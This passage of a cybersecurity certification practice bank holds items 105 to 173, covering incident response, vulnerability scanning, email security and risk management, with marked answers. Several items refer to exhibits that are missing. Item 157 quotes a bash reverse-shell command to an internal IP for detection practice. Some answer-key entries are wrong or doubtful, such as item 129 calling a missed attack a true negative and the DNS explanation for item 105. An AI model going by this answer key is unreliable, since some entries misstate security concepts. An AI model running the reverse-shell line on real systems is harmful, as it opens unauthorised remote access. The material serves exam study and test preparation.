Using application security scanning as part of the pipeline for the continuous integration/continuous delivery (CI/CD) flow can help mitigate the problem of finding the same vulnerabilities in a critical application during security scanning. This is because application security scanning can be integrated into the development lifecycle and performed automatically and frequently as part of the CI/CD process.

105
Q

An incident response team receives an alert to start an investigation of an internet outage. The outage is preventing all users in multiple locations from accessing external SaaS resources. The team determines the organization was impacted by a DDoS attack. Which of the following logs should the team review first?

A. CDN
B. Vulnerability scanner
C. DNS
D. Web server

A

C. DNS

A distributed denial-of-service (DDoS) attack is a type of cyberattack that aims to overwhelm a target’s network or server with a large volume of traffic from multiple sources. A common technique for launching a DDoS attack is to compromise DNS servers, which are responsible for resolving domain names into IP addresses. By flooding DNS servers with malicious requests, attackers can disrupt the normal functioning of the internet and prevent users from accessing external SaaS resources.

106
Q

A software developer has been deploying web applications with common security risks, including insufficient logging capabilities. Which of the following actions would be most effective to reduce risks associated with the application development?

A. Perform static analyses using an integrated development environment.
B. Deploy compensating controls into the environment.
C. Implement server-side logging and automatic updates.
D. Conduct regular code reviews using OWASP best practices.

A

D. Conduct regular code reviews using OWASP best practices.

Conducting regular code reviews using OWASP best practices is the most effective action to reduce risks associated with the application development. Code reviews are a systematic examination of the source code of an application to detect and fix errors, vulnerabilities, and weaknesses that may compromise the security, functionality, or performance of the application. Code reviews can help to improve the quality and security of the code, as well as to identify and remediate common security risks, such as insufficient logging capabilities. OWASP (Open Web Application Security Project) is a global nonprofit organization that provides free and open resources, tools, standards, and best practices for web application security. OWASP best practices for logging include following a common logging format and approach, logging relevant security events and data, protecting log data from unauthorized access or modification, and using log analysis and monitoring tools to detect and respond to security incidents. By following OWASP best practices for logging, developers can ensure that their web applications have sufficient and effective logging capabilities that can help to prevent, detect, and mitigate security threats.

107
Q

The vulnerability analyst reviews threat intelligence regarding emerging vulnerabilities affecting workstations that are used within the company:

Which of the following vulnerabilities should the analyst be most concerned about, knowing that end users frequently click on malicious links sent via email?

A. Vulnerability A
B. Vulnerability B
C. Vulnerability C
D. Vulnerability D

A

A. Vulnerability A

108
Q

A security analyst is reviewing the findings of the latest vulnerability report for a company’s web application. The web application accepts files for a Bash script to be processed if the files match a given hash. The analyst is able to submit files to the system due to a hash collision. Which of the following should the analyst suggest to mitigate the vulnerability with the fewest changes to the current script and infrastructure?

A. Deploy a WAF to the front of the application.
B. Replace the current MD5 with SHA-256.
C. Deploy an antivirus application on the hosting system.
D. Replace the MD5 with digital signatures.

A

B. Replace the current MD5 with SHA-256.

The vulnerability that the security analyst is able to exploit is a hash collision, which is a situation where two different files produce the same hash value. Hash collisions can allow an attacker to bypass the integrity or authentication checks that rely on hash values, and submit malicious files to the system. The web application uses MD5, which is a hashing algorithm that is known to be vulnerable to hash collisions. Therefore, the analyst should suggest replacing the current MD5 with SHA-256, which is a more secure and collision-resistant hashing algorithm. The other options are not the best suggestions to mitigate the vulnerability with the fewest changes to the current script and infrastructure. Deploying a WAF (web application firewall) to the front of the application (A) may help protect the web application from some common attacks, but it may not prevent hash collisions or detect malicious files. Deploying an antivirus application on the hosting system (C) may help scan and remove malicious files from the system, but it may not prevent hash collisions or block malicious files from being submitted. Replacing the MD5 with digital signatures (D) may help verify the authenticity and integrity of the files, but it may require significant changes to the current script and infrastructure, as digital signatures involve public-key cryptography and certificate authorities.

109
Q

A security analyst is validating a particular finding that was reported in a web application vulnerability scan to make sure it is not a false positive. The security analyst uses the snippet below:

Which of the following vulnerability types is the security analyst validating?

A. Directory traversal
B. XSS
C. XXE
D. SSRF

A

C. XXE

110
Q

After a security assessment was done by a third-party consulting firm, the cybersecurity program recommended integrating DLP and CASB to reduce analyst alert fatigue. Which of the following is the best possible outcome that this effort hopes to achieve?

A. SIEM ingestion logs are reduced by 20%.
B. Phishing alerts drop by 20%.
C. False positive rates drop to 20%.
D. The MTTR decreases by 20%.

A

D. The MTTR decreases by 20%.

111
Q

A financial industry services firm was the victim of an internal data breach, and the perpetrator was a member of the company’s development team. During the investigation, one of the security administrators accidentally deleted the perpetrator’s user data. Even though the data is recoverable, which of the following has been violated?

A. Chain of custody
B. Evidence acquisition
C. Containment
D. Root cause analysis

A

A. Chain of custody

112
Q

An analyst is becoming overwhelmed with the number of events that need to be investigated for a timeline. Which of the following should the analyst focus on in order to move the incident forward?

A. Impact
B. Vulnerability score
C. Mean time to detect
D. Isolation

A

A. Impact

113
Q

A company has the following security requirements:

  • No public IPs
  • All data secured at rest
  • No insecure ports/protocols

After a cloud scan is completed a security analyst receives reports that several misconfigurations are putting the company at risk. Given the following cloud scanner output:

Which of the following should the analyst recommend be updated first to meet the security requirements and reduce risks?

A. VM_PRD_DB
B. VM_DEV_DB
C. VM_DEV_Web02
D. VM_PRD_Web01

A

A. VM_PRD_DB

114
Q

An organization receives a legal hold request from an attorney. The request pertains to emails related to a disputed vendor contract. Which of the following is the best step for the security team to take to ensure compliance with the request?

A. Publicly disclose the request to other vendors.
B. Notify the departments involved to preserve potentially relevant information.
C. Establish a chain of custody starting with the attorney’s request.
D. Back up the mailboxes on the server and provide the attorney with a copy.

A

C. Establish a chain of custody starting with the attorney’s request.

115
Q

A security analyst needs to provide evidence of regular vulnerability scanning on the company’s network for an auditing process. Which of the following is an example of a tool that can produce such evidence?

A. OpenVAS
B. Burp Suite
C. Nmap
D. Wireshark

A

A. OpenVAS

116
Q

Which of the following best describes the reporting metric that should be utilized when measuring the degree to which a system, application, or user base is affected by an uptime availability outage?

A. Timeline
B. Evidence
C. Impact
D. Scope

A

C. Impact

117
Q

A web application team notifies a SOC analyst that there are thousands of HTTP/404 events on the public-facing web server. Which of the following is the next step for the analyst to take?

A. Instruct the firewall engineer that a rule needs to be added to block this external server.
B. Escalate the event to an incident and notify the SOC manager of the activity.
C. Notify the incident response team that there is a DDoS attack occurring.
D. Identify the IP/hostname for the requests and look at the related activity.

A

D. Identify the IP/hostname for the requests and look at the related activity.

118
Q

A vulnerability scanner generates the following output:

The company has an SLA for patching that requires time frames to be met for high-risk vulnerabilities. Which of the following should the analyst prioritize first for remediation?

A. Oracle JDK
B. Cisco Webex
C. Redis Server
D. SSL Self-signed Certificate

A

C. Redis Server

119
Q

After completing a review of network activity, the threat hunting team discovers a device on the network that sends an outbound email via a mail client to a non-company email address daily at 10:00 p.m. Which of the following is potentially occurring?

A. Irregular peer-to-peer communication
B. Rogue device on the network
C. Abnormal OS process behavior
D. Data exfiltration

A

D. Data exfiltration

120
Q

Which of the following actions would an analyst most likely perform after an incident has been investigated?

A. Risk assessment
B. Root cause analysis
C. Incident response plan
D. Tabletop exercise

A

B. Root cause analysis

121
Q

A Chief Information Security Officer wants to map all the attack vectors that the company faces each day. Which of the following recommendations should the company align their security controls around?

A. OSSTMM
B. Diamond Model of Intrusion Analysis
C. OWASP
D. MITRE ATT&CK

A

D. MITRE ATT&CK

122
Q

A new zero-day vulnerability was released. A security analyst is prioritizing which systems should receive compensating controls first. The systems have been grouped into the categories shown below:

Which of the following groups should be prioritized for compensating controls?

A. Group A
B. Group B
C. Group C
D. Group D

A

C. Group C

123
Q

An organization’s threat intelligence team notes a recent trend in adversary privilege escalation procedures. Multiple threat groups have been observed utilizing native Windows tools to bypass system controls and execute commands with privileged credentials. Which of the following controls would be most effective to reduce the rate of success of such attempts?

A. Set user account control protection to the most restrictive level on all devices.
B. Implement MFA requirements for all internal resources.
C. Harden systems by disabling or removing unnecessary services.
D. Implement controls to block execution of untrusted applications.

A

C. Harden systems by disabling or removing unnecessary services.

124
Q

An analyst is conducting routine vulnerability assessments on the company infrastructure. When performing these scans, a business-critical server crashes, and the cause is traced back to the vulnerability scanner. Which of the following is the cause of this issue?

A. The scanner is running without an agent installed.
B. The scanner is running in active mode.
C. The scanner is segmented improperly.
D. The scanner is configured with a scanning window.

A

B. The scanner is running in active mode.

125
Q

An organization has deployed a cloud-based storage system for shared data that is in phase two of the data life cycle. Which of the following controls should the security team ensure are addressed? (Choose two.)

A. Data classification
B. Data destruction
C. Data loss prevention
D. Encryption
E. Backups
F. Access controls

A

D. Encryption
F. Access controls

126
Q

A recent audit of the vulnerability management program outlined the finding for increased awareness of secure coding practices. Which of the following would be best to address the finding?

A. Establish quarterly SDLC training on the top vulnerabilities for developers.
B. Conduct a yearly inspection of the code repositories and provide the report to management.
C. Hire an external penetration test of the network.
D. Deploy more vulnerability scanners for increased coverage.

A

A. Establish quarterly SDLC training on the top vulnerabilities for developers.

127
Q

Which of the following risk management principles is accomplished by purchasing cyber insurance?

A. Accept
B. Avoid
C. Mitigate
D. Transfer

A

D. Transfer

128
Q

A cybersecurity analyst is tasked with scanning a web application to understand where the scan will go and whether there are URIs that should be denied access prior to more in-depth scanning. Which of the following best fits the type of scanning activity requested?

A. Uncredentialed scan
B. Discovery scan
C. Vulnerability scan
D. Credentialed scan

A

B. Discovery scan

129
Q

An organization enabled a SIEM rule to send an alert to a security analyst distribution list when ten failed logins occur within one minute. However, the control was unable to detect an attack with nine failed logins. Which of the following best represents what occurred?

A. False positive
B. True negative
C. False negative
D. True positive

A

B. True negative

130
Q

A security administrator has been notified by the IT operations department that some vulnerability reports contain an incomplete list of findings. Which of the following methods should be used to resolve this issue?

A. Credentialed scan
B. External scan
C. Differential scan
D. Network scan

A

A. Credentialed scan

131
Q

A security analyst at a company is reviewing an alert from the file integrity monitoring indicating a mismatch in the login.html file hash. After comparing the code with the previous version of the page source code, the analyst found the following code snippet added:

Which of the following best describes the activity the analyst has observed?

A. Obfuscated links
B. Exfiltration
C. Unauthorized changes
D. Beaconing

A

C. Unauthorized changes

132
Q

A company recently removed administrator rights from all of its end user workstations. An analyst uses CVSSv3.1 exploitability metrics to prioritize the vulnerabilities for the workstations and produces the following information:

Which of the following vulnerabilities should be prioritized for remediation?

A. nessie.explosion
B. vote.4p
C. sweet.bike
D. great.skills

A

D. great.skills

133
Q

An incident response analyst is taking over an investigation from another analyst. The investigation has been going on for the past few days. Which of the following steps is most important during the transition between the two analysts?

A. Identify and discuss the lessons learned with the prior analyst.
B. Accept all findings and continue to investigate the next item target.
C. Review the steps that the previous analyst followed.
D. Validate the root cause from the prior analyst.

A

C. Review the steps that the previous analyst followed.

134
Q

The security analyst received the monthly vulnerability report. The following findings were included in the report:

  • Five of the systems only required a reboot to finalize the patch application
  • Two of the servers are running outdated operating systems and cannot be patched

The analyst determines that the only way to ensure these servers cannot be compromised is to isolate them. Which of the following approaches will best minimize the risk of the outdated servers being compromised?

A. Compensating controls
B. Due diligence
C. Maintenance windows
D. Passive discovery

A

A. Compensating controls

135
Q

A security analyst discovers an ongoing ransomware attack while investigating a phishing email. The analyst downloads a copy of the file from the email and isolates the affected workstation from the network. Which of the following activities should the analyst perform next?

A. Wipe the computer and reinstall software.
B. Shut down the email server and quarantine it from the network.
C. Acquire a bit-level image of the affected workstation.
D. Search for other mail users who have received the same file.

A

D. Search for other mail users who have received the same file.

136
Q

After identifying a threat, a company has decided to implement a patch management program to remediate vulnerabilities. Which of the following risk management principles is the company exercising?

A. Transfer
B. Accept
C. Mitigate
D. Avoid

A

C. Mitigate

137
Q

Following a recent security incident, the Chief Information Security Officer is concerned with improving visibility and reporting of malicious actors in the environment. The goal is to reduce the time to prevent lateral movement and potential data exfiltration. Which of the following techniques will best achieve the improvement?

A. Mean time to detect.
B. Mean time to respond.
C. Mean time to remediate.
D. Service-level agreement uptime.

A

A. Mean time to detect.

138
Q

Security analysts review logs on multiple servers on a daily basis. Which of the following implementations will give the best central visibility into the events occurring throughout the corporate environment without logging in to the servers individually?

A. Deploy a database to aggregate the logging.
B. Configure the servers to forward logs to a SIEM.
C. Share the log directory on each server to allow local access.
D. Automate the emailing of logs to the analysts.

A

B. Configure the servers to forward logs to a SIEM.

139
Q

An organization recently changed its BC and DR plans. Which of the following would best allow for the incident response team to test the changes without any impact to the business?

A. Perform a tabletop drill based on previously identified incident scenarios.
B. Simulate an incident by shutting down power to the primary data center.
C. Migrate active workloads from the primary data center to the secondary location.
D. Compare the current plan to lessons learned from previous incidents.

A

A. Perform a tabletop drill based on previously identified incident scenarios.

140
Q

During a cybersecurity incident, one of the web servers at the perimeter network was affected by ransomware. Which of the following actions should be performed immediately?

A. Shut down the server.
B. Reimage the server.
C. Quarantine the server.
D. Update the OS to latest version.

A

C. Quarantine the server.

141
Q

An analyst wants to ensure that users only leverage web-based software that has been pre-approved by the organization. Which of the following should be deployed?

A. Blocklisting
B. Allowlisting
C. Graylisting
D. Webhooks

A

B. Allowlisting

142
Q

During an incident involving phishing, a security analyst needs to find the source of the malicious email. Which of the following techniques would provide the analyst with this information?

A. Header analysis
B. Packet capture
C. SSL inspection
D. Reverse engineering

A

A. Header analysis

143
Q

The email system administrator for an organization configured DKIM signing for all email legitimately sent by the organization. Which of the following would most likely indicate an email is malicious if the company’s domain name is used as both the sender and the recipient?

A. The message fails a DMARC check.
B. The sending IP address is the hosting provider.
C. The signature does not meet corporate standards.
D. The sender and reply address are different.

A

A. The message fails a DMARC check.

144
Q

A security administrator needs to import PII data records from the production environment to the test environment for testing purposes. Which of the following would best protect data confidentiality?

A. Data masking
B. Hashing
C. Watermarking
D. Encoding

A

A. Data masking

145
Q

An organization’s email account was compromised by a bad actor. Given the following information:

Which of the following is the length of time the team took to detect the threat?

A. 25 minutes
B. 40 minutes
C. 45 minutes
D. 2 hours

A

A. 25 minutes

146
Q

A company is deploying new vulnerability scanning software to assess its systems. The current network is highly segmented, and the networking team wants to minimize the number of unique firewall rules. Which of the following scanning techniques would be most efficient to achieve the objective?

A. Deploy agents on all systems to perform the scans.
B. Deploy a central scanner and perform non-credentialed scans.
C. Deploy a cloud-based scanner and perform a network scan.
D. Deploy a scanner sensor on every segment and perform credentialed scans.

A

D. Deploy a scanner sensor on every segment and perform credentialed scans.

147
Q

An organization was compromised, and the usernames and passwords of all employees were leaked online. Which of the following best describes the remediation that could reduce the impact of this situation?

A. Multifactor authentication
B. Password changes
C. System hardening
D. Password encryption

A

B. Password changes

148
Q

Which of the following would help an analyst to quickly find out whether the IP address in a SIEM alert is a known-malicious IP address?

A. Join an information sharing and analysis center specific to the company’s industry.
B. Upload threat intelligence to the IPS in STIX/TAXII format.
C. Add data enrichment for IPs in the ingestion pipeline.
D. Review threat feeds after viewing the SIEM alert.

A

C. Add data enrichment for IPs in the ingestion pipeline.

149
Q

A recent vulnerability scan resulted in an abnormally large number of critical and high findings that require patching. The SLA requires that the findings be remediated within a specific amount of time. Which of the following is the best approach to ensure all vulnerabilities are patched in accordance with the SLA?

A. Integrate an IT service delivery ticketing system to track remediation and closure.
B. Create a compensating control item until the system can be fully patched.
C. Accept the risk and decommission current assets as end of life.
D. Request an exception and manually patch each system.

A

A. Integrate an IT service delivery ticketing system to track remediation and closure.

150
Q

A vulnerability analyst received a list of system vulnerabilities and needs to evaluate the relevant impact of the exploits on the business. Given the constraints of the current sprint, only three can be remediated. Which of the following represents the least impactful risk, given the CVSS3.1 base scores?

A. AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:L - Base Score 6.0
B. AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:L - Base Score 7.2
C. AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H - Base Score 6.4
D. AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L - Base Score 6.5

A

D. AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L - Base Score 6.5

151
Q

A security analyst must review a suspicious email to determine its legitimacy. Which of the following should be performed? (Choose two.)

A. Evaluate scoring fields, such as Spam Confidence Level and Bulk Complaint Level.
B. Review the headers from the forwarded email.
C. Examine the recipient address field.
D. Review the Content-Type header.
E. Evaluate the HELO or EHLO string of the connecting email server.
F. Examine the SPF, DKIM, and DMARC fields from the original email.

A

A. Evaluate scoring fields, such as Spam Confidence Level and Bulk Complaint Level.
F. Examine the SPF, DKIM, and DMARC fields from the original email.

152
Q

A security analyst is trying to detect connections to a suspicious IP address by collecting the packet captures from the gateway. Which of the following commands should the security analyst consider running?

A. grep [IP address] packets.pcap
B. cat packets.pcap | grep [IP Address]
C. tcpdump -n -r packets.pcap host [IP address]
D. strings packets.pcap | grep [IP Address]

A

C. tcpdump -n -r packets.pcap host [IP address]

153
Q

Which of the following is the most important factor to ensure accurate incident response reporting?

A. A well-defined timeline of the events.
B. A guideline for regulatory reporting.
C. Logs from the impacted system.
D. A well-developed executive summary.

A

A. A well-defined timeline of the events.

154
Q

A systems administrator receives reports of an internet-accessible Linux server that is running very sluggishly. The administrator examines the server, sees a high amount of memory utilization, and suspects a DoS attack related to half-open TCP sessions consuming memory. Which of the following tools would best help to prove whether this server was experiencing this behavior?

A. Nmap
B. TCPDump
C. SIEM
D. EDR

A

B. TCPDump

155
Q

A security analyst needs to mitigate a known, exploited vulnerability related to an attack vector that embeds software through the USB interface. Which of the following should the analyst do first?

A. Conduct security awareness training on the risks of using unknown and unencrypted USBs.
B. Write a removable media policy that explains that USBs cannot be connected to a company asset.
C. Check configurations to determine whether USB ports are enabled on company assets.
D. Review logs to see whether this exploitable vulnerability has already impacted the company.

A

C. Check configurations to determine whether USB ports are enabled on company assets.

156
Q

A company is concerned with finding sensitive file storage locations that are open to the public. The current internal cloud network is flat. Which of the following is the best solution to secure the network?

A. Implement segmentation with ACLs.
B. Configure logging and monitoring to the SIEM.
C. Deploy MFA to cloud storage locations.
D. Roll out an IDS.

A

A. Implement segmentation with ACLs.

157
Q

A security analyst identified the following suspicious entry on the host-based IDS logs:

bash -i >& /dev/tcp/10.1.2.3/8080 0>&1

Which of the following shell scripts should the analyst use to most accurately confirm if the activity is ongoing?

A. #!/bin/bash
nc 10.1.2.3 8080 -vv >/dev/null && echo "Malicious activity" || echo "OK"

B. #!/bin/bash
ps -fea | grep 8080 >/dev/null && echo "Malicious activity" || echo "OK"

C. #!/bin/bash
ls /opt/tcp/10.1.2.3/8080 >/dev/null && echo "Malicious activity" || echo "OK"

D. #!/bin/bash
netstat -antp | grep 8080 >/dev/null && echo "Malicious activity" || echo "OK"

A

D. #!/bin/bash
netstat -antp | grep 8080 >/dev/null && echo "Malicious activity" || echo "OK"

158
Q

A SOC analyst recommends adding a layer of defense for all endpoints that will better protect against external threats regardless of the device’s operating system. Which of the following best meets this requirement?

A. SIEM
B. CASB
C. SOAR
D. EDR

A

D. EDR

159
Q

Using an API to insert bulk access requests from a file into an identity management system is an example of which of the following concepts?

A. Command and control
B. Data enrichment
C. Automation
D. Single sign-on

A

C. Automation

160
Q

Which of the following describes the best reason for conducting a root cause analysis?

A. The root cause analysis ensures that proper timelines were documented.
B. The root cause analysis allows the incident to be properly documented for reporting.
C. The root cause analysis develops recommendations to improve the process.
D. The root cause analysis identifies the contributing items that facilitated the event.

A

D. The root cause analysis identifies the contributing items that facilitated the event.

161
Q

An end-of-life date was announced for a widely used OS. A business-critical function is performed by some machinery that is controlled by a PC, which is utilizing the OS that is approaching the end-of-life date. Which of the following best describes a security analyst’s concern?

A. Any discovered vulnerabilities will not be remediated.
B. An outage of machinery would cost the organization money.
C. Support will not be available for the critical machinery.
D. There are no compensating controls in place for the OS.

A

A. Any discovered vulnerabilities will not be remediated.

162
Q

An analyst recommends that an EDR agent collect the source IP address, make a connection to the firewall, and create a policy to block the malicious source IP address across the entire network automatically. Which of the following is the best option to help the analyst implement this recommendation?

A. SOAR
B. SIEM
C. SLA
D. IoC

A

A. SOAR

163
Q

An analyst is examining events in multiple systems but is having difficulty correlating data points. Which of the following is most likely the issue with the system?

A. Access rights
B. Network segmentation
C. Time synchronization
D. Invalid playbook

A

C. Time synchronization

164
Q

A company receives a penetration test report summary from a third party. The report summary indicates a proxy has some patches that need to be applied. The proxy is sitting in a rack and is not being used, as the company has replaced it with a new one. The CVE score of the vulnerability on the proxy is a 9.8. Which of the following best practices should the company follow with this proxy?

A. Leave the proxy as is.
B. Decommission the proxy.
C. Migrate the proxy to the cloud.
D. Patch the proxy.

A

B. Decommission the proxy.

165
Q

A company is in the process of implementing a vulnerability management program. Which of the following scanning methods should be implemented to minimize the risk of OT/ICS devices malfunctioning due to the vulnerability identification process?

A. Non-credentialed scanning
B. Passive scanning
C. Agent-based scanning
D. Credentialed scanning

A

B. Passive scanning

166
Q

A security analyst is performing vulnerability scans on the network. The analyst installs a scanner appliance, configures the subnets to scan, and begins the scan of the network. Which of the following would be missing from a scan performed with this configuration?

A. Operating system version
B. Registry key values
C. Open ports
D. IP address

A

B. Registry key values

167
Q

A security analyst at a company called ACME Commercial notices there is outbound traffic to a host IP that resolves to https://office365password.acme.co. The site’s standard VPN logon page is www.acme.com/logon. Which of the following is most likely true?

A. This is a normal password change URL.
B. The security operations center is performing a routine password audit.
C. A new VPN gateway has been deployed.
D. A social engineering attack is underway.

A

D. A social engineering attack is underway.

168
Q

A systems analyst is limiting user access to system configuration keys and values in a Windows environment. Which of the following describes where the analyst can find these configuration items?

A. config.ini
B. ntds.dit
C. Master boot record
D. Registry

A

D. Registry

169
Q

An analyst receives threat intelligence regarding potential attacks from an actor with seemingly unlimited time and resources. Which of the following best describes the threat actor attributed to the malicious activity?

A. Insider threat
B. Ransomware group
C. Nation-state
D. Organized crime

A

C. Nation-state

170
Q

A managed security service provider is having difficulty retaining talent due to an increasing workload caused by a client doubling the number of devices connected to the network. Which of the following would best aid in decreasing the workload without increasing staff?

A. SIEM
B. XDR
C. SOAR
D. EDR

A

C. SOAR

171
Q

A SOC analyst identifies the following content while examining the output of a debugger command over a client-server application:

getConnection(database01, "alpha", "AxTv.127GdCx94GTd");

Which of the following is the most likely vulnerability in this system?

A. Lack of input validation
B. SQL injection
C. Hard-coded credential
D. Buffer overflow

A

C. Hard-coded credential

172
Q

An incident response team member is triaging a Linux server. The output is shown below:

Which of the following is the adversary most likely trying to do?

A. Create a backdoor root account named zsh.
B. Execute commands through an unsecured service account.
C. Send a beacon to a command-and-control server.
D. Perform a denial-of-service attack on the web server.

A

B. Execute commands through an unsecured service account.

173
Q

A cybersecurity analyst is reviewing SIEM logs and observes consistent requests originating from an internal host to a blocklisted external server. Which of the following best describes the activity that is taking place?

A. Data exfiltration
B. Rogue device
C. Scanning
D. Beaconing

A

D. Beaconing